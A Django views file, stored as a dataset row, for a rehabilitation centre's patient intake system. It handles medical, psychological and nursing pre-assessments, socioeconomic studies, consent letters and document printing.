index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,400 | cfdba341bb0f968101627d1ea53da4fab333473c | #from django.views.decorators.csrf import csrf_exempt
from django.db import IntegrityError, transaction
from django.shortcuts import render, render_to_response, RequestContext, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required, permission_required
from django.http import JsonResponse, HttpResponse, Http404
from .models import Paciente, HojaPrevaloracion, Expediente, HojaFrontal, ServicioExpediente, EstudioSocioE1, EstudioSocioE2, EstudioSocioE2IngresosEgresos, EstructuraFamiliaESE1, ProgramaExpediente, PacienteDataEnfermeria, CartaConsetimiento
from catalogos.models import Municipio, Estado, Ocupacion, Escolaridad, Referidopor, ServicioCree, ProgramaCree, MotivoEstudioSE, IngresosEgresos, TipoVivienda, ComponenteVivienda, ServicioVivienda, TenenciaVivienda, ConstruccionVivienda, BarreraArquitectonicaVivienda, ClasificacionEconomica, MensajesEnfemeriaTicket, EstadoCivil, Parentesco, MensajesCartaConsentimiento, SeguridadSocial
from .utils import getUpdateConsecutiveExpendiete, getClueExpediente, listCabezerasLocalidades
from .decorators import redirect_view, validViewPermissionRevisionMedica, validViewPermissionRevisionPsicologica, validViewPermissionTrabajoSocial, validViewPermissionImprimirDocumentos, validViewPermissionEnfemeria
from django.contrib.auth.models import User, Group
from datetime import date, datetime
from logs import logger
import sys
import json
#import pdb
SERVICIO_ESTUDIO_SOCIOECONOMICO1 = "PRECONSULTA"
SERVICIOS_EXCLUIDOS_MEDICO = ("PSICOLOGIA", "TRABAJO SOCIAL")
PROGRAMAS_EXCLUIDOS_MEDICO = ("INCLUSION EDUCATIVA", "ESCUELA PARA FAMILIAS CON HIJOS CON DISCAPACIDAD", "INCLUSION LABORAL")
CONSULTORIO = 1
INGRESO = "INGRESO"
EGRESO = "EGRESO"
EXTERNAS = "EXTERNAS"
INTERNAS = "INTERNAS"
@redirect_view
def home(request):
ocupaciones = Ocupacion.objects.filter(is_active=True)
escoliridades = Escolaridad.objects.filter(is_active=True)
referidospor = Referidopor.objects.filter(is_active=True)
municipios = Municipio.objects.all()
estados = Estado.objects.filter(is_active=True)
pacientes = Paciente.objects.filter(fechacreacion=date.today())
grupo = getUserGroupByRequest(request)
contexto = {'ocupaciones' : ocupaciones, 'escolaridades' : escoliridades, 'referidospor' : referidospor,
'municipios' : municipios, 'estados' : estados, 'pacientes' : pacientes, 'grupo': grupo}
return render_to_response('preconsulta/Prevaloracion.html', contexto, context_instance=RequestContext(request))
@validViewPermissionRevisionMedica
def revisionMedica(request, paciente):
tmppaciente = get_object_or_404(Paciente, curp=paciente)
servicios = ServicioCree.objects.filter(is_active=True).exclude(servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
programas = ProgramaCree.objects.filter(is_active=True).exclude(programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
parentesco = Parentesco.objects.filter(is_active=True)
tmpHojaPrevaloracion = None#HojaPrevaloracion
expediente = None#Expediente#None
try:
expediente = Expediente.objects.get(paciente__id=tmppaciente.id,is_active=True)
tmpHojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id,fechacreacion=date.today())
except:
expediente = None
#pass
#expediente = Expediente
contexto = {'servicios' : servicios, 'programas' : programas, 'curp' : paciente,
'hojaPrevaloracion': tmpHojaPrevaloracion, 'expediente': expediente,
'edad':tmppaciente.edad, 'parentesco': parentesco}
return render_to_response('preconsulta/PrevaloracionMedica.html', contexto, context_instance=RequestContext(request))
@validViewPermissionRevisionPsicologica
def psicologicaPrevaloracion(request, paciente):
tmppaciente = get_object_or_404(Paciente, curp=paciente)
servicios = ServicioCree.objects.filter(is_active=True, servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
programas = ProgramaCree.objects.filter(is_active=True, programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
tmpHojaPrevaloracion = None#HojaPrevaloracion
expediente = None#Expediente
try:
expediente = Expediente.objects.get(paciente__id=tmppaciente.id,is_active=True)
tmpHojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id,fechacreacion=date.today())
except:
expediente = None
#pass
#expediente = Expediente
contexto = {'curp' : paciente, 'servicios': servicios, 'programas': programas,
'hojaPrevaloracion': tmpHojaPrevaloracion, 'expediente': expediente}
return render_to_response('preconsulta/PrevaloracionPsicologica.html', contexto, context_instance=RequestContext(request))
@validViewPermissionEnfemeria
def enfermeriaPrevaloracion(request, paciente):
tmppaciente = get_object_or_404(Paciente, curp=paciente)
nombreCompletoPaciente = "%s %s %s" %(tmppaciente.nombre, tmppaciente.apellidoP, tmppaciente.apellidoM)
fechaActual = datetime.now() #date.today()
mensajeInformativo = MensajesEnfemeriaTicket.objects.get(is_active=True)
dataEnfermeria = None#PacienteDataEnfermeria
try:
dataEnfermeria = PacienteDataEnfermeria.objects.get(paciente__id=tmppaciente.id,fechacreacion=date.today())
except:
pass
#dataEnfermeria = PacienteDataEnfermeria
contexto = {'curp' : paciente, 'edad' : tmppaciente.edad, 'nombreCompletoPaciente' : nombreCompletoPaciente,
'fecha' : fechaActual, 'mensajeInformativo' : mensajeInformativo, 'dataEnfermeria': dataEnfermeria}
return render_to_response('preconsulta/PrevaloracionEnfermeria.html', contexto, context_instance=RequestContext(request))
@validViewPermissionTrabajoSocial
def estudioSPrevaloracion(request, paciente):
tmppaciente = get_object_or_404(Paciente, curp=paciente)
ocupaciones = Ocupacion.objects.filter(is_active=True)
escolaridades = Escolaridad.objects.filter(is_active=True)
motivosEstudio = MotivoEstudioSE.objects.filter(is_active=True)
ingresos = IngresosEgresos.objects.filter(tipo=INGRESO, is_active=True)
egresos = IngresosEgresos.objects.filter(tipo=EGRESO, is_active=True)
tipoVivienda = TipoVivienda.objects.filter(is_active=True)
componenteVivienda = ComponenteVivienda.objects.filter(is_active=True)
servicioVivienda = ServicioVivienda.objects.filter(is_active=True)
tenenciaVivienda = TenenciaVivienda.objects.filter(is_active=True)
construccionVivienda = ConstruccionVivienda.objects.filter(is_active=True)
barrerasInternasVivienda = BarreraArquitectonicaVivienda.objects.filter(tipo=INTERNAS,is_active=True)
barrerasExternasVivienda = BarreraArquitectonicaVivienda.objects.filter(tipo=EXTERNAS,is_active=True)
clasificacionEconomica = ClasificacionEconomica.objects.filter(is_active=True)
estadoCivil = EstadoCivil.objects.filter(is_active=True)
parentesco = Parentesco.objects.filter(is_active=True)
seguridadSocial = SeguridadSocial.objects.filter(is_active=True)
estudioSE1 = EstudioSocioE1
estudioSE2 = EstudioSocioE2
expediente = Expediente
estructuraFamiliar = None#EstructuraFamiliaESE1.objects
ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos
ingresos_egresos = IngresosEgresos
barrerasViviendaEstudio = BarreraArquitectonicaVivienda
barrerasVivienda = BarreraArquitectonicaVivienda
try:
expediente = Expediente.objects.get(paciente__id=tmppaciente.id, is_active=True)
estudioSE1 = EstudioSocioE1.objects.get(expediente__id=expediente.id, fechaestudio=date.today())
estudioSE2 = EstudioSocioE2.objects.get(estudiose__id=estudioSE1.id)
estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudioSE1.id)
ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos.objects.filter(estudio__id=estudioSE2.id) #Son los ingresos/egresos del estudio socio economico
ingresos_egresos = IngresosEgresos.objects.filter(is_active=True).exclude(id__in=[ie.ingreso_egreso.id for ie in ingresos_egresosEstudio]) #Son los ingresos/egresos del catalogo pero excluyendo los que tiene el estudio
barrerasViviendaEstudio = estudioSE2.barreravivienda.all()
barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True).exclude(id__in=[b.id for b in barrerasViviendaEstudio])
except:
ingresos_egresos = IngresosEgresos.objects.filter(is_active=True)
barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True)
contexto = {
'ocupaciones' : ocupaciones, 'motivosEsutdio' : motivosEstudio, 'egresos' : egresos,
'ingresos' : ingresos, 'tipoVivienda' : tipoVivienda, 'componentesVivienda' : componenteVivienda,
'servicioVivienda' : servicioVivienda, 'tenenciaVivienda' : tenenciaVivienda,
'construccionVivienda' : construccionVivienda, 'barrerasInternasVivienda' : barrerasInternasVivienda,
'barrerasExternasVivienda' : barrerasExternasVivienda, 'escolaridades' : escolaridades, 'curp' : paciente,
'clasificacionEconomica' : clasificacionEconomica, 'estudioSE1': estudioSE1, 'estudioSE2': estudioSE2,
'estructuraFamiliar': estructuraFamiliar, 'estadoCivil': estadoCivil, 'parentesco': parentesco,
'ingresos_egresosEstudio': ingresos_egresosEstudio, 'ingresos_egresos': ingresos_egresos, 'barrerasVivienda': barrerasVivienda,
'barrerasViviendaEstudio': barrerasViviendaEstudio, 'seguridadSocial': seguridadSocial
}
return render_to_response('preconsulta/PrevaloracionEstudioS.html', contexto, context_instance=RequestContext(request))
@validViewPermissionImprimirDocumentos
def imprimirDocumentos(request, paciente):
paciente = get_object_or_404(Paciente, curp=paciente)
fechaActual = date.today()
"""
Primero se hace el query de los encabezados (El expediente, hojas de prevaloracion y frontal, estudios socioeconomicos),
si no cuenta con alguno de ellos y si no se hicieron el mismo dia respondera con un error 404
"""
try:
expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
cartaConsentimiento = CartaConsetimiento.objects.get(expediente__id=expediente.id)
hojaPrevaloracion = HojaPrevaloracion.objects.get(expediente__id=expediente.id)
serviciosExpediente = ServicioExpediente.objects.filter(expediente__id=expediente.id) #Los servicios con los que cuenta este expediente
programasExpediente = ProgramaExpediente.objects.filter(expediente__id=expediente.id) #Los programas con los que cuenta este expediente
servicios = ServicioCree.objects.filter(is_active=True).exclude(id__in=[s.servicio.id for s in serviciosExpediente]) #Los servicios que ofrece el 'CREE' excluyendo los que tiene el expediente solicitado
programas = ProgramaCree.objects.filter(is_active=True).exclude(id__in=[p.programa.id for p in programasExpediente]) #Los programas que ofrece el 'CREE' excluyendo los que tiene el expediente solicitado
hojaFrontal = HojaFrontal.objects.filter(expediente__id=expediente.id)
estudioSE1 = EstudioSocioE1.objects.get(expediente__id=expediente.id)
estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudioSE1.id)
estudioSE2 = EstudioSocioE2.objects.get(estudiose__id=estudioSE1.id)
mensajeCartaC = MensajesCartaConsentimiento.objects.get(is_active=True)
except:
raise Http404
#tempIE = estudioSE2.ingresos_egresos.all()
ingresos_egresosEstudio = EstudioSocioE2IngresosEgresos.objects.filter(estudio__id=estudioSE2.id) #Son los ingresos/egresos del estudio socio economico
ingresos_egresos = IngresosEgresos.objects.filter(is_active=True).exclude(id__in=[ie.ingreso_egreso.id for ie in ingresos_egresosEstudio]) #Son los ingresos/egresos del catalogo pero excluyendo los que tiene el estudio
componentesViviendaE = estudioSE2.componentevivienda.all()
serviciosViviendaE = estudioSE2.serviciovivienda.all()
tenenciasViviendaE = estudioSE2.tenenciavivienda.all()
construccionViviendaE = estudioSE2.construccionvivienda.all()
barrerasViviendaE = estudioSE2.barreravivienda.all()
componentesVivienda = ComponenteVivienda.objects.filter(is_active=True).exclude(id__in=[c.id for c in componentesViviendaE])
serviciosVivienda = ServicioVivienda.objects.filter(is_active=True).exclude(id__in=[s.id for s in serviciosViviendaE])
tenenciasVivienda = TenenciaVivienda.objects.filter(is_active=True).exclude(id__in=[t.id for t in tenenciasViviendaE])
construccionVivienda = ConstruccionVivienda.objects.filter(is_active=True).exclude(id__in=[con.id for con in construccionViviendaE])
barrerasVivienda = BarreraArquitectonicaVivienda.objects.filter(is_active=True).exclude(id__in=[b.id for b in barrerasViviendaE])
deficitExcedente = estudioSE2.excedente - estudioSE2.deficit
deficit = None
if deficitExcedente < 0:
deficit = True
rowsVacios = 20 - len(serviciosExpediente)
rows = list()
for i in range(rowsVacios):
rows.append(i)
contexto = {'curp' : paciente.curp, 'paciente' : paciente, 'expediente' : expediente,
'hojaPrevaloracion': hojaPrevaloracion, 'hojaFrontal' : hojaFrontal, 'estudioSE1' : estudioSE1,
'estructuraFamiliar' : estructuraFamiliar, 'estudioSE2' : estudioSE2, 'serviciosExpediente': serviciosExpediente,
'servicios' : servicios, 'programas' : programas, 'programasExpediente' : programasExpediente,
'ingresos_egresos' : ingresos_egresos, 'ingresos_egresosEstudio' : ingresos_egresosEstudio,
'componentesVivienda' : componentesVivienda, 'serviciosVivienda' : serviciosVivienda,
'tenenciasVivienda' : tenenciasVivienda, 'construccionVivienda' : construccionVivienda,
'barrerasVivienda' : barrerasVivienda, 'componentesViviendaE' : componentesViviendaE,
'serviciosViviendaE' : serviciosViviendaE, 'tenenciasViviendaE' : tenenciasViviendaE,
'construccionViviendaE' : construccionViviendaE, 'barrerasViviendaE' : barrerasViviendaE, 'rows' : rows,
'cartaConsentimiento': cartaConsentimiento, 'fechaActual': fechaActual, 'mensajeCartaC': mensajeCartaC,
'deficitExcedente': deficitExcedente, 'deficit': deficit}
return render_to_response('preconsulta/ImprimirDocumentos.html', contexto, context_instance=RequestContext(request))
@validViewPermissionImprimirDocumentos
def imprimirDocumentosCaratula(request, paciente):
paciente = get_object_or_404(Paciente, curp=paciente)
expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
estudioSE1 = EstudioSocioE1.objects.get(expediente__id=expediente.id)
contexto = {'curp' : paciente.curp, 'paciente' : paciente, 'expediente' : expediente,
'estudioSE1' : estudioSE1,}
return render_to_response('preconsulta/ImprimirCaratula.html', contexto, context_instance=RequestContext(request))
def update_paciente(request):
if request.POST:
paciente = get_object_or_404(Paciente, curp=request.POST['curpPaciente'])
try:
mensaje = "Error al crear el parciente."
u = User.objects.get(username=request.user)
paciente.curp = request.POST['curp']
paciente.nombre = request.POST['nombre']
paciente.apellidoP = request.POST['apellidoP']
paciente.apellidoM = request.POST['apellidoM']
paciente.edad = request.POST['edad']
paciente.genero = request.POST['genero']
paciente.fechanacimiento = request.POST['fechaN']
paciente.telefonocasa = request.POST['telCasa']
paciente.telefonocelular = request.POST['celular']
paciente.localidad = request.POST['localidad']
paciente.estadoprocedente__id = request.POST['estado']
paciente.municipio__id = request.POST['municipio']
paciente.referidopor__id = request.POST['referidopor']
paciente.escolaridad__id = request.POST['escolaridad']
paciente.ocupacion__id = request.POST['ocupacion']
paciente.calle = request.POST['calle']
paciente.entrecalles = request.POST['entreCalles']
paciente.colonia = request.POST['colonia']
paciente.numerocasa = request.POST['numCasa']
paciente.codigopostal = request.POST['codigoPostal']
#paciente.usuariocreacion__id = u.perfil_usuario.id
paciente.save()
mensaje = "ok"
except IntegrityError as e:
logger.error(str(e))
mensaje = "La curp del paciente ya existe en la base de datos."
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al crear el parciente."
response = JsonResponse({'isOk': mensaje})
return HttpResponse(response.content)
else:
raise Http404
def get_paciente(request):
if request.POST:
paciente = get_object_or_404(Paciente, curp=request.POST['curpPaciente'])
response = JsonResponse({'nombre': paciente.nombre, 'apellidoP': paciente.apellidoP, 'apellidoM': paciente.apellidoM,
'edad': paciente.edad, 'genero': paciente.genero, 'nacimiento':paciente.fechanacimiento,
'telcasa': paciente.telefonocasa, 'telcelular': paciente.telefonocelular, 'localidad': paciente.localidad,
'idEstado': paciente.estadoprocedente.id, 'idMunicipio': paciente.municipio.id, 'idReferidopor': paciente.referidopor.id,
'idEscolaridad': paciente.escolaridad.id, 'idOcupacion': paciente.ocupacion.id, 'calle': paciente.calle,
'entrecalles': paciente.entrecalles, 'colonia': paciente.colonia, 'numerocasa': paciente.numerocasa,
'codigopostal': paciente.codigopostal})
return HttpResponse(response.content)
else:
raise Http404
def addEstudioSocioeconomico(request):
if request.POST:
clave = RepresentsInt(request.POST['claveEstudio'])
if clave > 0:
try:
with transaction.atomic():
mensaje = "Error al actualizar los estudios socio economicos."
paciente = Paciente.objects.get(curp=request.POST['curp'])
estudio1 = EstudioSocioE1.objects.get(id=clave)
estudio2 = EstudioSocioE2.objects.get(estudiose__id=estudio1.id)
estructuraFamiliar = EstructuraFamiliaESE1.objects.filter(estudiose__id=estudio1.id)
estrucFamiliarNueva = request.POST.getlist('EstructuraF[]')
ingresos = request.POST.getlist('ingresos[]')
egresos = request.POST.getlist('egresos[]')
serviciosV = request.POST.getlist('servicios[]')
componentesV = request.POST.getlist('componentes[]')
construccionV = request.POST.getlist('construccion[]')
tenenciasV = request.POST.getlist('tenencias[]')
barrerasIV = request.POST.getlist('barrerasI[]')
barrerasEV = request.POST.getlist('barrerasE[]')
estudio1.edad = paciente.edad
estudio1.estadocivil = request.POST['estadoCivil']
estudio1.nombreentevistado = request.POST['nombreEntrevistado']
estudio1.apellidosentevistado = request.POST['apellidoEntrevistado']
estudio1.calle = paciente.calle
estudio1.entrecalles = paciente.entrecalles
estudio1.colonia = paciente.colonia
estudio1.numerocasa = paciente.numerocasa
estudio1.codigopostal = paciente.codigopostal
estudio1.clasificacion_id = request.POST['clasifacionEconomica']
estudio1.ocupacion_id = paciente.ocupacion.id
estudio1.escolaridad_id = paciente.escolaridad.id
estudio1.motivoestudio_id = request.POST['motivoEstudio']
estudio1.motivoclasificacion = request.POST['justificacionClasf']
estudio1.parentescoentrevistado = request.POST['parentescoEntrevistado']
estudio1.seguridad_social_id = request.POST['seguridadSocial']
estudio2.excedente = request.POST['excedente']
estudio2.datosignificativo = request.POST['datosSignificativos']
estudio2.diagnosticoplansocial = request.POST['diagnosticoPlanS']
estudio2.cantidadbanios = request.POST['cantidadBanios']
estudio2.cantidadrecamaras = request.POST['cantidadRecamaras']
estudio2.vivienda_id = request.POST['tipoVivienda']
estructuraFamiliar.delete()
for estrucF in estrucFamiliarNueva:
estructura = json.loads(estrucF)
EstructuraFamiliaESE1.objects.create(
nombrefamiliar = estructura['nombreF'],
apellidosfamiliar = estructura['apellidosF'],
parentesco = estructura['parentescoF'],
estadocivil = estructura['estadoCivilF'],
estudiose_id = estudio1.id,
ocupacion_id = estructura['ocupacionF'],
escolaridad_id = estructura['escolaridadF'],
edad = estructura['edadF'],
)
estudio1.save()
estudio2.save()
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al actualizar los estudios socio economicos."
else:
try:
with transaction.atomic():
mensaje = "Error al crear los estudios socio economicos"
paciente = Paciente.objects.get(curp=request.POST['curp'])
expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
estuidoTemp = EstudioSocioE1.objects.filter(expediente__id=expediente.id, fechaestudio=date.today())
if estuidoTemp:
mensaje = "Ya cuenta con un estudio socioeconomico el dia de hoy"
response = JsonResponse({'isOk' : mensaje})
return HttpResponse(response.content)
estructuraFamiliar = request.POST.getlist('EstructuraF[]')
ingresos = request.POST.getlist('ingresos[]')
egresos = request.POST.getlist('egresos[]')
serviciosV = request.POST.getlist('servicios[]')
componentesV = request.POST.getlist('componentes[]')
construccionV = request.POST.getlist('construccion[]')
tenenciasV = request.POST.getlist('tenencias[]')
barrerasIV = request.POST.getlist('barrerasI[]')
barrerasEV = request.POST.getlist('barrerasE[]')
u = User.objects.get(username=request.user)
estudio1 = EstudioSocioE1.objects.create(
edad = paciente.edad,
estadocivil = request.POST['estadoCivil'],
consultorio = CONSULTORIO,#request.POST['consultorio'],
nombreentevistado = request.POST['nombreEntrevistado'],
apellidosentevistado = request.POST['apellidoEntrevistado'],
calle = paciente.calle,
entrecalles = paciente.entrecalles,
colonia = paciente.colonia,
numerocasa = paciente.numerocasa,
codigopostal = paciente.codigopostal,
clasificacion_id = request.POST['clasifacionEconomica'],
ocupacion_id = paciente.ocupacion.id,
escolaridad_id = paciente.escolaridad.id,
servicio_id = 1,#request.POST['servicio'],
motivoestudio_id = request.POST['motivoEstudio'],
expediente_id = expediente.id,
usuariocreacion_id = u.perfil_usuario.id,#request.POST['usuario'],
motivoclasificacion = request.POST['justificacionClasf'],
parentescoentrevistado = request.POST['parentescoEntrevistado'],
seguridad_social_id = request.POST['seguridadSocial'],
)
for i in estructuraFamiliar:
estructura = json.loads(i)
EstructuraFamiliaESE1.objects.create(
nombrefamiliar = estructura['nombreF'],
apellidosfamiliar = estructura['apellidosF'],
parentesco = estructura['parentescoF'],
estadocivil = estructura['estadoCivilF'],
estudiose_id = estudio1.id,
ocupacion_id = estructura['ocupacionF'],
escolaridad_id = estructura['escolaridadF'],
edad = estructura['edadF'],
)
estudio2 = EstudioSocioE2.objects.create(
deficit = request.POST['deficit'],
excedente = request.POST['excedente'],
datosignificativo = request.POST['datosSignificativos'],
diagnosticoplansocial = request.POST['diagnosticoPlanS'],
cantidadbanios = request.POST['cantidadBanios'],
cantidadrecamaras = request.POST['cantidadRecamaras'],
estudiose_id = estudio1.id,
#usuariocreacion_id = 1,
vivienda_id = request.POST['tipoVivienda']
)
for i in ingresos:
ingreso = json.loads(i)
EstudioSocioE2IngresosEgresos.objects.create(ingreso_egreso_id=ingreso['id'], estudio_id=estudio2.id, monto=ingreso['valor'])
for i in egresos:
egreso = json.loads(i)
EstudioSocioE2IngresosEgresos.objects.create(ingreso_egreso_id=egreso['id'], estudio_id=estudio2.id, monto=egreso['valor'])
for i in serviciosV:
estudio2.serviciovivienda.add(i)
for i in componentesV:
estudio2.componentevivienda.add(i)
for i in construccionV:
estudio2.construccionvivienda.add(i)
for i in tenenciasV:
estudio2.tenenciavivienda.add(i)
for i in barrerasIV:
estudio2.barreravivienda.add(i)
for i in barrerasEV:
estudio2.barreravivienda.add(i)
cabezarasLocalidades = listCabezerasLocalidades()
expediente.clue = getClueExpediente(paciente.localidad, cabezarasLocalidades, estudio1.seguridad_social.clave)
expediente.save()
paciente.imprimir = True
paciente.save()
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al crear los estudios socio economicos."
response = JsonResponse({'isOk' : mensaje, 'curp': paciente.curp})
return HttpResponse(response.content)
else:
raise Http404
#@csrf_exempt
def addPsicologiaHojaPrevaloracion(request):
if request.POST:
try:
with transaction.atomic():
mensaje = "Error al actualizar la hoja de prevaloracion"
paciente = Paciente.objects.get(curp=request.POST['curp'])
expediente = Expediente.objects.get(paciente__id=paciente.id, is_active=True)
hojaPrev = HojaPrevaloracion.objects.get(expediente__id=expediente.id, fechacreacion=date.today())
u = User.objects.get(username=request.user)
servicios = request.POST.getlist('servicios[]')
programas = request.POST.getlist('programas[]')
hojaPrev.diagnosticonosologico2 = request.POST['diagnosticoNosologicoBreve']
hojaPrev.psicologia = request.POST['psicologia']
hojaPrev.psicologo_id = u.perfil_usuario.id
hojaPrev.save()
#tmpVarS = expediente.servicios.filter(servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
#tmpVarP = expediente.programas.filter(programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
tmpVarS = ServicioExpediente.objects.filter(expediente__id=expediente.id).filter(servicio__servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
tmpVarP = ProgramaExpediente.objects.filter(expediente__id=expediente.id).filter(programa__programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
tmpVarS.delete()
tmpVarP.delete()
for servicio in servicios:
ServicioExpediente.objects.create(
expediente_id = expediente.id,
servicio_id = servicio,
hojaPrevaloracion_id = hojaPrev.id,
fechaBaja = date.today()
)
for programa in programas:
ProgramaExpediente.objects.create(
expediente_id = expediente.id,
programa_id = programa,
hojaPrevaloracion_id = hojaPrev.id,
fechaBaja = date.today()
)
try:
hojaFront = HojaFrontal.objects.get(expediente__id=expediente.id, fechacreacion=date.today(), usuario__id=hojaPrev.psicologo.id)
hojaFront.diagnosticonosologico = request.POST['diagnosticoNosologicoBreve']
hojaFront.save()
except:
HojaFrontal.objects.create(
edad = paciente.edad,
diagnosticonosologico = request.POST['diagnosticoNosologicoBreve'],
usuario_id = u.perfil_usuario.id,
expediente_id = expediente.id
)
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al actualizar la hoja de prevaloracion."
response = JsonResponse({'isOk' : mensaje})
return HttpResponse(response.content)
else:
raise Http404
#@csrf_exempt
def addHojaPrevaloracion(request):
if request.POST:
clave = RepresentsInt(request.POST['clave'])
if clave > 0:
try:
with transaction.atomic():
servicios = request.POST.getlist('servicios[]')
programas = request.POST.getlist('programas[]')
paciente = Paciente.objects.get(curp=request.POST['curp'])
hojaPrevaloracion = HojaPrevaloracion.objects.get(id=request.POST['clave'])
expediente = Expediente.objects.get(id=hojaPrevaloracion.expediente.id)
hojaFrontal = HojaFrontal.objects.get(expediente__id=expediente.id, fechacreacion=date.today(), usuario__id=hojaPrevaloracion.doctor.id)
if len(servicios) > 0:
paciente.correspondio = True
paciente.save()
else:
paciente.correspondio = False
paciente.save()
correspondio = paciente.correspondio
hojaPrevaloracion.motivoconsulta = request.POST['motivoConsulta']
hojaPrevaloracion.diagnosticonosologico = request.POST['diagnosticoNosologico']
hojaPrevaloracion.canalizacion = request.POST['canalizacion']
hojaPrevaloracion.edad = paciente.edad
hojaPrevaloracion.ocupacion_id = paciente.ocupacion.id
hojaPrevaloracion.referidopor_id = paciente.referidopor.id
hojaPrevaloracion.escolaridad_id = paciente.escolaridad.id
hojaPrevaloracion.save()
tmpVarS = ServicioExpediente.objects.filter(expediente__id=expediente.id).exclude(servicio__servicio__in=[s for s in SERVICIOS_EXCLUIDOS_MEDICO])
tmpVarP = ProgramaExpediente.objects.filter(expediente__id=expediente.id).exclude(programa__programa__in=[p for p in PROGRAMAS_EXCLUIDOS_MEDICO])
tmpVarS.delete()
tmpVarP.delete()
for servicio in servicios:
ServicioExpediente.objects.create(
expediente_id = expediente.id,
servicio_id = servicio,
hojaPrevaloracion_id = hojaPrevaloracion.id,
fechaBaja = date.today()
)
for programa in programas:
ProgramaExpediente.objects.create(
expediente_id = expediente.id,
programa_id = programa,
hojaPrevaloracion_id = hojaPrevaloracion.id,
fechaBaja = date.today()
)
hojaFrontal.diagnosticonosologico = request.POST['diagnosticoNosologico']
hojaFrontal.save()
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al crear la hoja de prevaloracion."
else:
try:
correspondio = False
with transaction.atomic():
mensaje = "Error al crear la hoja de prevaloracion"
paciente = Paciente.objects.get(curp=request.POST['curp'])
if str(paciente.correspondio) == "True" or str(paciente.correspondio) == "False":
mensaje = "Ya cuenta con una hoja de prevaloracion hecha el dia de hoy."
response = JsonResponse({'curp' : request.POST['curp'], 'correspondio' : correspondio,
'isOk' : mensaje})
return HttpResponse(response.content)
servicios = request.POST.getlist('servicios[]')
programas = request.POST.getlist('programas[]')
if len(servicios) > 0:
paciente.correspondio = True
paciente.save()
claveExpediente = getUpdateConsecutiveExpendiete()
expediente = Expediente.objects.create(
claveexpediente = claveExpediente,
paciente_id = paciente.id,
fechaalta = "2015-03-30",
)
u = User.objects.get(username=request.user)
hojaPreValoracion = HojaPrevaloracion.objects.create(
motivoconsulta = request.POST['motivoConsulta'],
diagnosticonosologico = request.POST['diagnosticoNosologico'],
canalizacion = request.POST['canalizacion'],
edad = paciente.edad,
ocupacion_id = paciente.ocupacion.id,
referidopor_id = paciente.referidopor.id,
escolaridad_id = paciente.escolaridad.id,
doctor_id = u.perfil_usuario.id,
psicologo_id = 1,
expediente_id = expediente.id
)
for servicio in servicios:
ServicioExpediente.objects.create(
expediente_id = expediente.id,
servicio_id = servicio,
hojaPrevaloracion_id = hojaPreValoracion.id,
fechaBaja = date.today()
)
for programa in programas:
ProgramaExpediente.objects.create(
expediente_id = expediente.id,
programa_id = programa,
hojaPrevaloracion_id = hojaPreValoracion.id,
fechaBaja = date.today()
)
hojaFrontal = HojaFrontal.objects.create(
edad = paciente.edad,
diagnosticonosologico = request.POST['diagnosticoNosologico'],
usuario_id = u.perfil_usuario.id,
expediente_id = expediente.id
)
"""
if paciente.edad > 18:
print request.POST['nombreResponsable'] #= ""
print request.POST['apellidosResponsable'] #= ""
print request.POST['edadResponsable'] #= ""
print request.POST['parentescoResponsable'] #= ""
print request.POST['domicilioResponsable'] #= ""
print request.POST['coloniaResponsable'] #= ""
print request.POST['codigopostalResponsable'] #= ""
"""
cartaConsentimiento = CartaConsetimiento.objects.create(
edad = paciente.edad,
calle = paciente.calle,
entrecalles = paciente.entrecalles,
numerocasa = paciente.numerocasa,
colonia = paciente.colonia,
codigopostal = paciente.codigopostal,
estadoprocedente_id = paciente.estadoprocedente.id,
municipio_id = paciente.municipio.id,
nombreresponsable = request.POST['nombreResponsable'],
apellidosresponsable = request.POST['apellidosResponsable'],
edadresponsable = request.POST['edadResponsable'],
generoresponsable = request.POST['generoResponsable'],
parentescoresponsable = request.POST['parentescoResponsable'],
domicilioresponsable = request.POST['domicilioResponsable'],
coloniaresponsable = request.POST['coloniaResponsable'],
codigopostalresponsable = request.POST['codigopostalResponsable'],
telefonoresponsable = request.POST['telefonoResponsable'],
doctor_id = u.perfil_usuario.id,
expediente_id = expediente.id,
diagnostico = request.POST['diagnosticoNosologico']
)
correspondio = True
else:
paciente.correspondio = False
paciente.save()
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al crear la hoja de prevaloracion."
response = JsonResponse({'curp' : request.POST['curp'], 'correspondio' : correspondio,
'isOk' : mensaje})
return HttpResponse(response.content)
